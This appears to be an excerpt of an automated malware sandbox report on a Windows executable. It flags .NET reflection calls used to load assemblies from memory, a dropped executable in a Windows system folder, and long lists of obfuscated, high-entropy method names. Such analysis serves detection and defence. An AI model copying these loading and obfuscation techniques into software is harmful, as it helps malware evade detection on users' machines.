Source: 0.3.Mj6WEKda85.exe.6741da5.0.raw.unpack, HBRWHN6saMuh8516BYe.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.3.Mj6WEKda85.exe.705bda5.1.raw.unpack, HBRWHN6saMuh8516BYe.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

.NET source code contains potential unpacker

Source: 0.3.Mj6WEKda85.exe.6741da5.0.raw.unpack, dIR6ysnvBERslYIVmQH.cs	.Net Code: VPbPq9gQV1 System.AppDomain.Load(byte[])
Source: 0.3.Mj6WEKda85.exe.6741da5.0.raw.unpack, dIR6ysnvBERslYIVmQH.cs	.Net Code: VPbPq9gQV1 System.Reflection.Assembly.Load(byte[])
Source: 0.3.Mj6WEKda85.exe.6741da5.0.raw.unpack, dIR6ysnvBERslYIVmQH.cs	.Net Code: VPbPq9gQV1
Source: 0.3.Mj6WEKda85.exe.705bda5.1.raw.unpack, dIR6ysnvBERslYIVmQH.cs	.Net Code: VPbPq9gQV1 System.AppDomain.Load(byte[])
Source: 0.3.Mj6WEKda85.exe.705bda5.1.raw.unpack, dIR6ysnvBERslYIVmQH.cs	.Net Code: VPbPq9gQV1 System.Reflection.Assembly.Load(byte[])
Source: 0.3.Mj6WEKda85.exe.705bda5.1.raw.unpack, dIR6ysnvBERslYIVmQH.cs	.Net Code: VPbPq9gQV1

Source: C:\Users\user\Desktop\Mj6WEKda85.exe

File created: C:\savesbrokerCrt\__tmp_rar_sfx_access_check_7216078

Jump to behavior

Source: Mj6WEKda85.exe

Static PE information: section name: .didat

Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Code function: 0_2_0087E28C push eax; ret	0_2_0087E2AA
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Code function: 0_2_0087ED46 push ecx; ret	0_2_0087ED59
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Code function: 23_2_00007FF848F400BD pushad ; iretd	23_2_00007FF848F400C1

Source: 0.3.Mj6WEKda85.exe.6741da5.0.raw.unpack, OKFqqrcSntX9gYbZpvf.cs	High entropy of concatenated method names: 'gBnnclCb4l', 'pH0nn2IKVt', 'sfhnP8nl6y', 'rr52bPurAgZErkgFgsj', 'f8vViRu8LCQQ4F790Au', 'rkn4bsuEmMoRWlXPRlp', 'rMjTTLuQNQglSYmGhQV', 'EPegVLuWHHZJV3Iy4te', 'tvZV1EuHVcPsiyD9XUv', 'trEEXluNH5YOxbDYNSx'
Source: 0.3.Mj6WEKda85.exe.6741da5.0.raw.unpack, Tu7PaQPWE4WMNwkUBkg.cs	High entropy of concatenated method names: 'irYtD24myx', 'SLgtzew33Y', 'QGdadrUlsr6Lh8S1eEe', 'tKeBLtUjFcAPWtmu7d0', 'fD2qNOUkrPgkWGJ1CKY', 'PoJA2oUJ6XZHJmnIOjO'
Source: 0.3.Mj6WEKda85.exe.6741da5.0.raw.unpack, El4tQmPXCxrJsBKTNEv.cs	High entropy of concatenated method names: 'riUMFMcUUi', 'LpbMGvcWs0', 'SKiMb0bF3T', 'h0IKX56ffg2JvP1x5aD', 'rQHQum67QJQ7ZLmK1vA', 'cksD536bPq1tMfYkvGx', 'phTWK86igVMdig5VmbT', 'iB5M3SUC0d', 'lIAMin0EUO', 'UFIMUmsqhi'
Source: 0.3.Mj6WEKda85.exe.6741da5.0.raw.unpack, KL61SOcugB2wZpdLeHl.cs	High entropy of concatenated method names: 'GvP', 'YZ8', 'bp6', 'G9C', 'l04Qe0ZVDarOKuJxjjP', 'a9kA2GZ9Wo5HmB6ZkKc', 'TdUDeKZyPlMXgwwMeK1', 'MrJLIcZR1BjNwU0nakl', 'eHZwgrZKhjOlgNfoGeM', 'B5IB3mZkf64RbYOVvTX'
Source: 0.3.Mj6WEKda85.exe.6741da5.0.raw.unpack, FVT4CynGxibE91pdbk6.cs	High entropy of concatenated method names: 'HFVItT4Cyx', 'jfGGTc3aY3My6Y1neYw', 'jwdCRh3IFPM5nNsfhDD', 'foDgAN3NKNuTaL7p9V7', 'FtMsG83AgdFnFsSNbpw', 'XBD1o93zEeYtqnvlG5N', 'GTYhw8dC7RnmKj1D0Zs', 'wfIcUJdFiD36Wn0CQEb', 'aWrSGpdSGYfujpgaY6B', 'GuEwbndnpWFPo6OgOw0'
Source: 0.3.Mj6WEKda85.exe.6741da5.0.raw.unpack, o1mtC50m8X6nVWWApBI.cs	High entropy of concatenated method names: 'eRQt527sl8', '_1kO', '_9v4', '_294', 'wv4txsOj0P', 'euj', 'TbutKhYwZl', 'FSmtL0x0Ky', 'o87', 'ilqtkBvG3K'
Source: 0.3.Mj6WEKda85.exe.6741da5.0.raw.unpack, NbcyTBPHROse1AliPpD.cs	High entropy of concatenated method names: 'sg9', 'qkwfeh58yC', 'O4KvB7P4fk', 'cRifyi3OTy', 'NX5rKIUGLR22Li7BTno', 'Jtl9cKUETrkapjT5rdx', 'CKu9fKUQTytw7oaQ6Pn', 'Vl5y7sUexrAJPUyCq3s', 'pNSKYMUmGFw5VKxdg4x', 'YONewtUrmEZw80LKfCc'
Source: 0.3.Mj6WEKda85.exe.6741da5.0.raw.unpack, RiaTM2nnaZtp7vZPiPu.cs	High entropy of concatenated method names: 'zQSnjHrNBr', 'irFnwDH0TW', 'dTZnmVEyBJ', 'pa5n8bQ11j', 'SEinV1OYe5', 'D9BnDUdC9m', 'Qvx15U7dfFrMQssrh6M', 'PSppaP7hadm7XX36fqq', 'PaxSvU7puOoTMUCVRup', 'FYUg1t73AyRNascUOov'
Source: 0.3.Mj6WEKda85.exe.6741da5.0.raw.unpack, rLWN0ZcZCnW2gPddZP1.cs	High entropy of concatenated method names: 'Ai7', 'YZ8', '_56U', 'G9C', 'naHqttwI4FxKjEMxHDt', 'P9aXlNwzR0UTiEI2RPo', 'YsCE4MZCLDeFsTxZLxl', 'KI8cMiZFgERlXGNhSFe', 'kyFDTCZSBtCJxWynI3x', 'Cf8BmJZnQP55SvXujNQ'
Source: 0.3.Mj6WEKda85.exe.6741da5.0.raw.unpack, aRZsr0yZCUDQMOrSVm6.cs	High entropy of concatenated method names: 'VVgsFxZlUl', 'kubsGOEttg', 'kSQsb0vHgR', 'd4XsaiHHeP', 'jZHspZnhxi', 'BRWoOas4ngpGLu3euv1', 'SaiPjFsd9H7GUQ5tPvZ', 'HN9gOJshY59QKKWJ1IO', 'Gp1sM7sPTfM42ikyo6g', 'FQ0BmOs6bMNnudAaKOf'
Source: 0.3.Mj6WEKda85.exe.6741da5.0.raw.unpack, QPGhui5My0L4dPFrkI.cs	High entropy of concatenated method names: 'AVuKA9MAD', 'S82LJQY83', 'vD2k45sr9', 'wFxZkM0Q8', 'dU6CD8eeI', 'klZuWl7HF', 'IMBtqP72d', 'EH38BaFwomxxbmTSAoL', 'iZ9N58FZNelivod2SCv', 'fy4MD7FuAbeW0CScdP9'
Source: 0.3.Mj6WEKda85.exe.6741da5.0.raw.unpack, ggm3HjcD6JoR8jTBOAq.cs	High entropy of concatenated method names: '_589', 'YZ8', '_491', 'G9C', 'RW8bIYvEEUBmq4SZP3g', 'WK2mwMvQRcGQHOeyN94', 'okWXCcvrD5LJRhPATdw', 'auEjZsv8vj8FCMcrNqF', 'aDVVLRvWGqoAJ5lu9yA', 'qPkHEGvHNvtKXExbrlI'
Source: 0.3.Mj6WEKda85.exe.6741da5.0.raw.unpack, a66g0vnqCdyxfxlPbsE.cs	High entropy of concatenated method names: 'fpfPN92W4j', 'V30XkqfnAEaTpyq34wM', 'SbfgRwf0h1XMhhxd8Ft', 'wbopm6fFrXbCBd89ARv', 'YRAIETfSjX1rOvNeu6u', 'eQiiPMfgHTN3treDRIt', 'EQK8XaftmnA5MGA9vgW', 'msN1EMfDNplLZjqgw2q', 'dHpYtqfwFlaEEmkOiTT', 'rV7dO1fZIkAtK19DJ7h'
Source: 0.3.Mj6WEKda85.exe.6741da5.0.raw.unpack, QfJ8mH0ZlVAXSfie34Q.cs	High entropy of concatenated method names: 'D4M', '_4DP', 'HU2', '_4Ke', '_5C9', '_7b1', 'lV5', 'H7p', 'V5L', '_736'
Source: 0.3.Mj6WEKda85.exe.6741da5.0.raw.unpack, ILqHNQ00Rk7ueQauqpN.cs	High entropy of concatenated method names: 'Qkp', '_72e', 'R26', '_7w6', 'Awi', 'n73', 'cek', 'ro1', '_9j4', '_453'
Source: 0.3.Mj6WEKda85.exe.6741da5.0.raw.unpack, Ck6oUEChy6clYbASpK.cs	High entropy of concatenated method names: 'T43', 'YZ8', '_56i', 'G9C', 'jSSDBNSvhchdKAacgpW', 'JTcq2FSToLVH2ZInfsU', 'ibN76gS7p9fEiA90ePK', 'xsVZUSSbIbTI9tdhTEg', 'slFTToSfv0WngKXqJvq', 'ffMdnHSivxwGXQ3PhCh'
Source: 0.3.Mj6WEKda85.exe.6741da5.0.raw.unpack, OkXErsPiXvUYZ9cbggm.cs	High entropy of concatenated method names: 'dCBMwHvOdu', 'nXAMmvL8OW', 'gMpM8WGavQ', 'VTliVE6e0ix2DiSFpNr', 'GirIgs6m33cqkrcPJBt', 'yN0h2x6GkbUjY6b45OK', 'CWEOQv6EkwyPef8cLYb', 'OQJ5bX6Q45c0Ns6f48b', 'WrppMc6rOkXc0sKjj3W', 'd1ai8n68I352GudR1DZ'
Source: 0.3.Mj6WEKda85.exe.6741da5.0.raw.unpack, eqE3CryBWE6RurIy3oc.cs	High entropy of concatenated method names: 'ICU', 'j9U', 'IBK', '_6qM', 'Amn', 'Mc2', 'og6', 'z6i', '_5G6', 'r11'
Source: 0.3.Mj6WEKda85.exe.6741da5.0.raw.unpack, G3Q4WkIhhrWBivMDPD2.cs	High entropy of concatenated method names: 'q4Y', '_71O', '_6H6', 'YVTLxCnb1C', '_13H', 'I64', '_67a', '_71t', 'fEj', '_9OJ'
Source: 0.3.Mj6WEKda85.exe.6741da5.0.raw.unpack, WPFryKPDk3vB5SUC0dl.cs	High entropy of concatenated method names: '_269', '_5E7', 'MB3fuugODS', 'Mz8', 'NAnfKshkVI', 'gRs1a1Yrx56Nrgn6DFV', 'VJV5TxY8yBrcEBhi8gt', 'EI4GSJYWwgchIPjvJUc', 'lbXSBZYHv4bfMoG8uwC', 'pcHl7KYNdLRSmSW9iwc'
Source: 0.3.Mj6WEKda85.exe.6741da5.0.raw.unpack, L9PRfspiUJFIxdWSZm.cs	High entropy of concatenated method names: '_59M', 'YZ8', '_1zA', 'G9C', 'KGFFeInV053ml2ddIES', 'VQmvAbn9twEmpsXVXr7', 'UGPXPdnyki6VAksMB0M', 'fBkWIqnRCZvJUp5Cr9U', 'Wq0q4anKORAgnia76uf', 'a5fOdInkqAs3fuHeqFS'
Source: 0.3.Mj6WEKda85.exe.6741da5.0.raw.unpack, lOvYQiPzLyy2ctBPhYh.cs	High entropy of concatenated method names: 'jcIXCqE3Cr', 'KE6XuRurIy', 'nocXtxQPYF', 'JR1tbHqk5X59b156vr8', 'G3UAaRqJlIm0OIofwXM', 'LhrFXIqR00PsCR1QKyp', 'NuRfKRqKPe0eBW132SN', 'WsEgQ2qlfSVcAO4XIP0', 'DIaqekqjCw0Ka1NNeF1', 'rxJws9qe3UCt1YLjgho'
Source: 0.3.Mj6WEKda85.exe.6741da5.0.raw.unpack, LDcOBpcIWmkd1rxjFEb.cs	High entropy of concatenated method names: 'K55', 'YZ8', '_9yX', 'G9C', 'tywqOJteBmtu736VWbu', 'cJLRT7tmSUcVkeBhKOS', 'PaTNKJtGvI23aUGJj15', 'owS3KhtEkmb4GCkc4lw', 'yX8AqjtQXi0HvlMeE18', 'hsD6FotrNWQAx8bYZWh'
Source: 0.3.Mj6WEKda85.exe.6741da5.0.raw.unpack, z8I7JNPoGTQHGnYtv8o.cs	High entropy of concatenated method names: 'Fmhv3FruAI', 'SXYvi27X1q', 'oXlvUr7xN2', 'nH18E6xlTCIsNTAWG9C', 'XBtDGexkZbL88Cm7QCj', 'bjvY1pxJXU2XEKhPbdU', 'ppDHPqxj6qoiqwMmvo1', 'QJhv0xmTXy', 'UEZv6en08U', 'pVYvMuuZPd'
Source: 0.3.Mj6WEKda85.exe.6741da5.0.raw.unpack, CO4vvpWU2bunBFLJDO.cs	High entropy of concatenated method names: '_23T', 'YZ8', 'ELp', 'G9C', 'XF70xcnNdgeHRX9FNMA', 'V0Ze7wnA0FF004tyDpt', 'UvCwwjnaqNh29JfUQaM', 'eqEf2EnIldIMjdjPj8O', 'pa05DEnzIAFi3bIvWrD', 'MPQn3k0CW00cADq4nOq'
Source: 0.3.Mj6WEKda85.exe.6741da5.0.raw.unpack, qW4P90cconmDXUWlh3n.cs	High entropy of concatenated method names: 'tO4', 'YZ8', '_4kf', 'G9C', 'pu18wqt41vFsTYxeimH', 'cvQYeqtPfiVW3iViZdr', 'mKepMQt6i19eYU0WuoC', 'qk649Otx6X0YN3rLaWI', 'Wt54JxtU9Fck7jpU4Pr', 'VFNHXitYoWDElfmSMAG'
Source: 0.3.Mj6WEKda85.exe.6741da5.0.raw.unpack, M4Tf4VIf0uHC3WoSaUb.cs	High entropy of concatenated method names: 'M05KjAa9DY', 'nvQKwXZb1T', 'nuEKmABZAB', 'GIL19U9KGYDpHpg1xj1', 'K2QAxh9yhOiWkgDpJVs', 'HOhh0F9RahshCg70GT7', 'ybcKe39kyU4HCcElwcP', 'JGVEfm9J4qwIHxp0hIn', 'PTVy8K9lLJGyGwidJ2e', 'zmAcQL9j1BMOfZ2Nhf0'
Source: 0.3.Mj6WEKda85.exe.6741da5.0.raw.unpack, LCkp3PnrNQMH894HkCT.cs	High entropy of concatenated method names: 'WcZ6LYNQ5q', 'dE1aOohQdJ0io30fH1J', 'aWg68yhG2SwGWnBtsBW', 'GfyNvfhE1ov4Mv78Op7', 'P1onCShrLwXdZplPYFS', 'A5lCBDh8IXuEbh94cuj', 'n5361stR6R', 'oGZ6owssdl', 'yN16RJaL42', 'sQR6efSHFy'
Source: 0.3.Mj6WEKda85.exe.6741da5.0.raw.unpack, VPom0g62rjQsicLJWwg.cs	High entropy of concatenated method names: 'Av2CB5fffrUtZ', 'TSDT7kei5wtrKgs21SX', 'x2wGnGep1XIvfc7PtHg', 'imIEp6e39P6LDeqrBfO', 'ASbgened1CIyAtJIYYB', 'mwYK9Feh3RES3nL5E1m', 'ysHo7yebZ4DpXKXwg7O', 'Ti7ULSef8NLKZV7fVLW', 'kUjMXse4etcmAKnUZrp', 'Hl5bHGeP5719Vg14RfF'
Source: 0.3.Mj6WEKda85.exe.6741da5.0.raw.unpack, Gl4dfV0Q3IfH6QTQIje.cs	High entropy of concatenated method names: '_159', 'rI9', '_2Cj', 'mdbZLkSsBg', 'k4CZkk3hkj', 'bYDZZAJplX', 'i3UZCupK3D', 'peDZuCdOuo', 'gi4ZtMy1TU', 'Cg58eiJ9xvhEDxtOEfm'
Source: 0.3.Mj6WEKda85.exe.6741da5.0.raw.unpack, U26UojIOOhyWCeKEQZO.cs	High entropy of concatenated method names: 'lgUKVsKpNS', 'XTsKDLKScj', 'aQQKJU2MXn', 'v7qKNqN9Gx', 'iqAKhfOYTR', 'fLYKBsW5Ei', 'C2hauB9Gc0iuuVhR5D5', 'l2OGMm9efL1559lqsLJ', 'yfaM099mmHnTdL2Wyoy', 'OPTxn89EmyO15gJLAgG'
Source: 0.3.Mj6WEKda85.exe.6741da5.0.raw.unpack, asRciPcLWy7oUSvFSVi.cs	High entropy of concatenated method names: 'p23', 'YZ8', 'Gog', 'G9C', 'BCxKhqwmKTOQeuwfS2t', 'zhx7drwGj77axIAq9Ni', 'X64BAEwEKWmp9gXZdXM', 'SpQP6KwQu7B8mdRisuW', 'TxiCvWwr4RjSlld5rST', 'X0oElZw8l8Utfw84LhN'
Source: 0.3.Mj6WEKda85.exe.6741da5.0.raw.unpack, bZVeqScpgWXRwUKxW1I.cs	High entropy of concatenated method names: 'bb2cBKUcGN', 'w6FfK1u98l3rhRPY5xw', 'y2g5vXuytZM9NCUB2M2', 'wMv7qguM9RoRGMb5mBJ', 'tu4eHBuVAIQRLkbYrNT', 'zLw0LpuR0O3silyWqIv', '_3Xh', 'YZ8', '_123', 'G9C'
Source: 0.3.Mj6WEKda85.exe.6741da5.0.raw.unpack, S04pDJcd5uebia6IS26.cs	High entropy of concatenated method names: 'I4Un2M13ZP', 'NrWn9aTSbQ', 'XWCqacvTKROfSe8FvRq', 'A5QRMqvuMyrBWMX0LJE', 'LwQT2kvvqAIWBJbmkl0', 'syTj51v7nNyq2PB0DLQ', 'nG020xvb33xxi93p8c3', 'Rk2AENvfHvsnNrZra8m', 'Tuo9WRvi8JfouoZGxuf', 'fNjfOTvp8dHCqM6VG8v'
Source: 0.3.Mj6WEKda85.exe.6741da5.0.raw.unpack, khablubVn9QQlBdkbq.cs	High entropy of concatenated method names: '_3OK', 'YZ8', '_321', 'G9C', 'ihUdDsSaW6GH6AfJICH', 'thbpaPSItidwqAyHjik', 'UWNKsgSzqLD27LZE1Sx', 'YN9ggwnCcgBkAjHnPhx', 'e2oeR4nFbkVt18jyRoP', 'nUbAHTnSv7uhnsewjHi'
Source: 0.3.Mj6WEKda85.exe.6741da5.0.raw.unpack, IWGavQy2wV9NDh7h2bs.cs	High entropy of concatenated method names: '_4J6', '_5Di', '_1y5', '_77a', '_1X1', '_7fn', 'OUK', '_8S4', 'wUn', '_447'
Source: 0.3.Mj6WEKda85.exe.6741da5.0.raw.unpack, As44NpPqBJYv9G6XfF5.cs	High entropy of concatenated method names: 'xanMTALJDg', 'bRHMA1ZXqY', 'iEMMgnXhAj', 'ku4MdrwZdh', 'CustMO6O5R4ujJbEDQH', 'cJAbYf6MGYLAp88kHq6', 'z9rGSi6VLoak1nWInkS', 'dRItrA62vs8IJa2W0ui', 'PxytKg6L2MkX7BUFE0b', 'dPcnAQ69Gt80QZk2ulx'
Source: 0.3.Mj6WEKda85.exe.6741da5.0.raw.unpack, zwahWyIr66smaWPEOG5.cs	High entropy of concatenated method names: 'Wr9LC10A6g', 'h4fLu9knIh', 'F8e', 'bLw', 'U96', '_71a', 'O52', 'K5ZLtHYExR', '_5f9', 'A6Y'
Source: 0.3.Mj6WEKda85.exe.6741da5.0.raw.unpack, FDH0TWcoyTZVEyBJUa5.cs	High entropy of concatenated method names: 'OA6ctUS1gP', 'cpytL8wdeFiKLTNh0R3', 'sT0eUSwhBWWbrhpZ701', 'xlJJavwpDBVVkOJ79G9', 'QiIT1Nw3yqtI51ESrvT', 'GKUtDGw4Ef4DmdNLIK7', 'LoUXFswPjFZZZilk3Ug', 'nqGdWVw6ArNBRMG0OxG', 'RsDQHowxkdO2mnbYoNb', 'f28'
Source: 0.3.Mj6WEKda85.exe.6741da5.0.raw.unpack, zLvxsQPyTWs7NAtgUrj.cs	High entropy of concatenated method names: 'T566He3jAp', 'Eo46TCjyyb', 'O526A9cPO5', 'Bkw6gWxdHm', 'HQ66dbhlIC', 'gGR6joRvIi', 'FvP47Q4ccMnHuQiPQ5b', 'zYLwtF4sSe0U5iYSWgS', 'JHlDQl4oqkfGAD8iMif', 'lkLydH4BY0doxDcuOS0'
Source: 0.3.Mj6WEKda85.exe.6741da5.0.raw.unpack, CsCngyc70Z6U8MwtypA.cs	High entropy of concatenated method names: 'yiQ', 'YZ8', '_5li', 'G9C', 's0nyuZwCFY2UssW8YJM', 'X9QqAXwFBS53hPo3bc3', 'XLipYdwSsLpt3fMw96V', 'vTRkxlwnVd6u0D5qJRP', 'WCdfZlw0sKWCoJifn2c', 'OnfCMqwguiHVsNJL0J5'
Source: 0.3.Mj6WEKda85.exe.6741da5.0.raw.unpack, IN9YnBcvm2WXevGcfMT.cs	High entropy of concatenated method names: '_3fO', 'YZ8', '_48A', 'G9C', 'ta5AGmDDLhyFgU61gbN', 'JBBEDqDwsBTHo5BIkSp', 'CMFfgxDZB3XZrQu3MFV', 'fuixt1DuagGw7PfjRHT', 'lDnoMNDv8HLmIWw6VDP', 'U2AxpiDTM5a7g4FovEU'
Source: 0.3.Mj6WEKda85.exe.6741da5.0.raw.unpack, EoQ0vCAntRlM2iWIVJ.cs	High entropy of concatenated method names: '_468', 'YZ8', '_2M1', 'G9C', 'EnXwVp0dxqo35mL4GXA', 'oYO6DI0heiixPt3SLhY', 'tWwVXS04tkobSU0cgT7', 'eaGOxb0Pb7CshnY83lO', 'wANnIW06TmrVtQwMxja', 't3VIXI0xROhZ5HEpaq4'
Source: 0.3.Mj6WEKda85.exe.6741da5.0.raw.unpack, HBRWHN6saMuh8516BYe.cs	High entropy of concatenated method names: 'SW9odIe11HkHlqH2ER4', 'j9pqxcesEClt2QRMl1P', 'siC6kjeqAkrU8HO92nL', 'udcr2re53xtBC42c6B6', 'FOYQqZJhHD', 'bFuiPjeBT3RTRY7XZP2', 'Jia3EteX6WYUBiv9S3r', 'RY5JPCe2dTbefxYCdd8', 'TTiJkAeLMlEhUqhmwWb', 'kiF7XueOOTSgoMSYQeq'
Source: 0.3.Mj6WEKda85.exe.6741da5.0.raw.unpack, vLbdIOnW8BsRrXqanIg.cs	High entropy of concatenated method names: 's9D0MUcW7Q', 'rwZ0vk8FHm', 'SafL6edH6Mnp6qcvUCq', 'RfIH2pdNmoMHWa5GxH7', 'KrtsiId8yxGakkfumuX', 'qrShW3dWwcXLarPUyra', 'Akp0U3PNQM', 'e1AAMjhCS1XXPmNqrqH', 'r0ARQIhFNsBnOgIMc4T', 'rTOInvdIcn7TG864hWY'
Source: 0.3.Mj6WEKda85.exe.6741da5.0.raw.unpack, KTwyZpnudvm8YAG6wHt.cs	High entropy of concatenated method names: 'QqsyBqYfIN', 'W2Hyrc1c9l', 'ULeyzMSvpo', 'P3RI4xBGmB', 't1aIcD6LUM', 'iI1InT9fi2', 'tGYIPMQOyg', 'WwsIygBGhI', 'rIUIIBTJ4U', 'TpEnhcpHLnqehGPVO0O'
Source: 0.3.Mj6WEKda85.exe.6741da5.0.raw.unpack, VYJfkdci3cVxrQXILCt.cs	High entropy of concatenated method names: '_981', 'YZ8', 'd52', 'G9C', 'n7qefOD80Bi7suhkDGB', 'FflcEGDWiZYCSatUbcL', 'k7WaA6DHsSoRrp78LlL', 'RhJNjODN3ihfJvQypAW', 'nl07YpDAo6tkIkNUFLD', 'P2HiOSDaYS4YbX6OZXt'
Source: 0.3.Mj6WEKda85.exe.6741da5.0.raw.unpack, NI8XY2ye7X1qiXlr7xN.cs	High entropy of concatenated method names: 'kovlFu1U1o', 'fiilGVwfbI', 'CHOlbnDuxL', 'fBOla1XugD', 'pgqlpfBPJZ', 'Mwv25C1MZu6bJvmkTXo', 'f2A43j1VYmSg0YDnpaR', 'SXBysF1Lp9Q17YB6QEL', 'vvWKcN1ORarRiJ3egv7', 'tsAKkV19r3U9YhcGZjw'
Source: 0.3.Mj6WEKda85.exe.6741da5.0.raw.unpack, IHJSBNzthqNPF1TjE3.cs	High entropy of concatenated method names: 'Y29', 'YZ8', 'jn6', 'G9C', 'TqL247tn68A1qF5sdH6', 'H1oFiFt0dmb7P5HqKGR', 'NYurGOtgfQ0Ts5lgivr', 'GReJZAtt1Vwuu1MjosU', 'AU6DuatDFmbV1f46r1R', 'n3r3ZntwS1KmTMHW0AO'
Source: 0.3.Mj6WEKda85.exe.6741da5.0.raw.unpack, c5YVOac6V9ZroRRnHel.cs	High entropy of concatenated method names: '_6H9', 'YZ8', '_66N', 'G9C', 'SBCPQQtHxpZsJM8Lbnf', 'tc9iHBtNZwOqeIFPHoC', 'k81DrHtAZviRpgoDfNw', 'l9jYAytagXaXPn8sKWP', 'vDeIXNtIjSF0hCZ3GjT', 'u9ZVrPtzfrhqxL47kx3'
Source: 0.3.Mj6WEKda85.exe.6741da5.0.raw.unpack, vMh6ICcNcT1OZAgubdp.cs	High entropy of concatenated method names: 'uxLnoxn5YV', 'Dg5ESUTtmEtmljTxfkR', 'NrNpFATDoERfx7QRE8C', 'n3N0gcT0u6hl5Xu48py', 'trdTPmTgXVdg6dMH51d', 'Ga1SYGTwGrojFfSFPe4', '_5q7', 'YZ8', '_6kf', 'G9C'
Source: 0.3.Mj6WEKda85.exe.6741da5.0.raw.unpack, shgrErcl4mJFH2iCJRq.cs	High entropy of concatenated method names: 'd43', 'YZ8', 'g67', 'G9C', 'fCIN6ADsAdoMPEUaBFO', 'ksMyn0DoUpvm1nMYo9R', 'am3nVgDcGkZ4XSSDsli', 'Nauu8QDB9PP9DUkb5g7', 'mWMS8XDXZOHQmNKIPHc', 'E1nrs6D2VXU0ukeBOq1'
Source: 0.3.Mj6WEKda85.exe.6741da5.0.raw.unpack, bohIMAcfsfXgZ1FA6sm.cs	High entropy of concatenated method names: 'OxZcgASXVZ', 'QWuNJyuSm8bF1FsNqNy', 'AdeV2vunLaUEJUQZxq8', 'yLPLGbuCbyQ7YGhsA9m', 'JH696auFIOHT1ANy01d', 'mCfwUou0n4UHr5Y8nUu', 'N7IrbDugOCnX4xGAhLL', 'oPcrqGut623yihRJg7O', 'vV4cj9AtrM', 'uyUlAnuZl6tGGGSWua9'
Source: 0.3.Mj6WEKda85.exe.6741da5.0.raw.unpack, imKb1Ecqsy7KDNqsVQn.cs	High entropy of concatenated method names: 'rU3', 'YZ8', 'M54', 'G9C', 'kYqL7iDRDKCB45UMyGg', 'L1ef7SDKIJC0Etn7JU0', 'yDN6NlDkNhMZZcJoY3A', 'SJja62DJvUsqDgSllNX', 'e9n3QPDlMjRFxi8CbB9', 'hJiOMaDjnVXto0BKV84'
Source: 0.3.Mj6WEKda85.exe.6741da5.0.raw.unpack, MKQmNnPlX4hUOZPC5Li.cs	High entropy of concatenated method names: '_223', 'grHOYh6drityfJndDPP', 'fBLo5m6hLpa3OZdj4CO', 'uWmjtD64Auy2JVNppLp', 'Te4MBM6PrQ4uJUtxuPV', 'jZbwor66iryhHxo7cjx', 'WiyvSf6xGEOr02FZN6n', 'RXHTur6U94SYAGcbfrs', 'P3bOAo6YO1XLXjonvDd', 'q9nQ9p6q1LyWIyU3jGa'
Source: 0.3.Mj6WEKda85.exe.6741da5.0.raw.unpack, wGaehZnp4aKQVNXJLU4.cs	High entropy of concatenated method names: '_0023Nn', 'Dispose', 'DObIGbj3sf', 'tfsIb7KGae', 'XZ4IaaKQVN', 'jJLIpU4Kat', 'yr9IE1h7tp', 'NSMqD4dZpNuisS67mae', 'ddTVjrduxGnnqA030IE', 'AcjM0udDgXj9shsoUNS'
Source: 0.3.Mj6WEKda85.exe.6741da5.0.raw.unpack, d5lUSDcwwuumicTDmyI.cs	High entropy of concatenated method names: '_625', 'YZ8', '_9pX', 'G9C', 'AfjTVHv6nTbfumVkuG7', 'HBoXtpvxtkN3LSP00Kj', 'LkjAkFvUft4LSDDEVbU', 'NI79s5vYg8dIgFfWf4p', 'o1M52YvqN0OIcvcCDGK', 'cQg0wqv5plGsNNc95JS'
Source: 0.3.Mj6WEKda85.exe.6741da5.0.raw.unpack, HVDntlcPfV8Kmhp624I.cs	High entropy of concatenated method names: 'R1x', 'YZ8', '_8U7', 'G9C', 'oPArBltB0iilBjp4uNt', 'l8eEeltXFqNX1nJKuUs', 'uenc26t2iFSHOVEosvf', 'nnI3HktLHAdsjHV5gUr', 'V0WmLNtOJeqmBhXeQrY', 'UMlcO4tMVjwN2I2HDOj'
Source: 0.3.Mj6WEKda85.exe.6741da5.0.raw.unpack, tDHEp30u3LGJvrvMbdu.cs	High entropy of concatenated method names: 'CNPZvp9XHR', 'PdTZXjOWr1', 'iiSZ2MkY3T', '_3Gf', '_4XH', '_3mv', '_684', '_555', 'Z9E', 'HngZ90VHB2'
Source: 0.3.Mj6WEKda85.exe.6741da5.0.raw.unpack, CbItHO0xnDuxL0BO1Xu.cs	High entropy of concatenated method names: 'IGD', 'CV5', 'OMAkKwP8bx', '_3k4', 'elq', 'hlH', 'yc1', 'Y17', '_2QC', 'En1'
Source: 0.3.Mj6WEKda85.exe.6741da5.0.raw.unpack, KDOaqy0aVGCirGHiFie.cs	High entropy of concatenated method names: 'lyEupiKcYR', 'jtZc2HlBAdefVpLxqyH', 'S0Lo2IlXJ3CJ38BomgI', 'JnOs8TloyyZOpeDAWEd', 'zLKhVflcA3lQ9SR6H4Y', '_1fi', 's2SC8AUvA6', '_676', 'IG9', 'mdP'
Source: 0.3.Mj6WEKda85.exe.6741da5.0.raw.unpack, lSgbNOcY9gP63JBU0Uq.cs	High entropy of concatenated method names: 'gHL', 'YZ8', 'vF9', 'G9C', 'X0DLLWwq34UeCK5SXcM', 'Xca7ffw5maCQW6U02Dt', 'AkVTe5w1kNQ3O6AAiOK', 'nXL8GHws9htkufW0FvL', 'DxcS0xwo0yy78WS6Hfd', 'I0LWgSwcHjUOfItNstV'
Source: 0.3.Mj6WEKda85.exe.6741da5.0.raw.unpack, UhxmTXyUyDEZen08UUV.cs	High entropy of concatenated method names: 'Nx1lyYyZ38', 'KwTlIH5Cbs', 'FpZl0oSpGo', 'GRcKUv13KPJ33JwM3PL', 'JfWqAF1dPelBfZoLP83', 'WiIjyK1iP8dQxZmfL77', 'MhHkEK1pwBB2q4bF4hV', 'YPXaLU1hbxsP5AkdSCa', 'BZaOC214lw8qBsIqcaX', 'my6M4q1P22pK5GvMaBX'
Source: 0.3.Mj6WEKda85.exe.6741da5.0.raw.unpack, q6wQKFy156WpyJUsX7r.cs	High entropy of concatenated method names: '_7zt', 'Y2VlobOFGW', 'TdRlRbR7bH', 'j9Rlel6ctn', 'DfrlYFsTJv', 'ijXl5COuBp', 'heSlx94Ueo', 'TmgSgo1UfhI3npC17OV', 'ltq9up1Y0AI6lmRnTjn', 'VEXm4N1699RtHbSX0C5'
